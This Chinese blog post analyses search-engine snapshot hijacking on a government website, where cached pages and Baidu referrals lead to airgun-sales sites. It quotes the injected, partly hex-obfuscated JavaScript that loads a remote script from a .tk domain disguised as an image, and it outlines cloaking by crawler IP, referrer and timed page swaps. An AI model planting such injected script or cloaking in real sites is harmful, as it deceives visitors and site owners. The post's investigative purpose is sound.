百度快照劫持技術解析

god_7z1發表於2013-01-03

最近有人出售搜尋引擎劫持技術,此技術可迅速提高網站排名,而且不易發現。

大家可以試下:用百度搜尋氣槍關鍵詞發現排名靠前的都是gov的站,但是快照內容是氣槍網站的相關內容,點選進去也是氣槍的網站。

但是如果通過域名直接訪問會發現進入的卻是正常的網站,以此推測目標站點肯定被掛上了某種特殊的程式碼。

這種手段如果不是有人投訴管理員一般是不會發現的,所以危害性還是很大的。

發現偽裝JS檔案,疑似JS手段實現

直接檢視gov目標的原始碼,沒有發現任何問題,通過FF的外掛可以看到,頁面通過SCRIPT腳步方式載入了一個“http://www.xxxx.tk/image.gif”的檔案,通過萬網的WHOIS居然提示不能查詢TK域名,難得的是WHO.IS也依然沒有結果,站長工具的WHOIS查詢倒是出了結果,可沒有任何意義。

本地PING,發現域名指向的是127.0.0.1,難道問題不在這裡?

在伺服器中js/common.js檔案中找到了兩句問題程式碼

var _$=["\x3c\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3d\x68\x74\x74\x70\x3a\/\/\x77\x77\x77\x2e\x77\x7a\x62\x33\x36\x30\x2e\x74\x6b\/\x69\x6d\x61\x67\x65\x2e\x67\x69\x66\x3e\x3c\/\x73\x63\x72\x69\x70\x74\x3e"];
document.writeln(_$[0]);
document.writeln(“<script src=http:\/\/www.wzb360.tk\/image.gif><\/script>”);

第二句就是之前發現的問題程式碼,但是訪問不了。

第一句加密了,解密之後發現和第二句是同樣的程式碼。

懷疑是伺服器做了特殊處理,只有在bd.gov.cn載入JS形式時才可以訪問。

百度快照蛛絲馬跡,黑客偷樑換柱

百度快照劫持技術解析

如上圖 (點選提示403,再點下訪問就可以了)

從快照中看出百度索引到的頁面並不是我們訪問時候看到的頁面,頁面結構是純CSS組成,並且沒有呼叫外部檔案,頂部有一個“保定市人民政府 ”的連結指向了http://www.bd.gov.cn/defaolt.aspx,那麼毋庸置疑,能實現這種效果的只有兩種方法:

第一種,在凌晨時間段把假的主頁換上去,對於這樣的高權重站,百度在晚上是絕對不會休息的,那麼每天的0點到3點換上假的主頁,不出3天肯定能索引到這個“主頁”。

第二種方法,在主頁中做手腳,改動程式判斷百度蜘蛛來路IP,送給百度偽造的主頁,不過這種方法管理員容易找到痕跡,只是猜測。

方法和原理都知道了,不過最關鍵的一段跳轉程式碼沒有看到,還是有點遺憾,朽木先琢磨琢磨再發表。

補充:

之前朽木的瀏覽器是IE9,看不了全部快取,現在可以肯定跳轉做到了程式裡,應該是default.aspx檔案中載入了判斷指令碼,如果來路是百度,並且關鍵字是“氣槍”那麼頁面就會跳轉到他的網站去。

至於之前發現的偽裝JS檔案,可能是同一人作為,覺得JS的效果不好,也可能是之前其他的人入侵之後留下的。

相關文章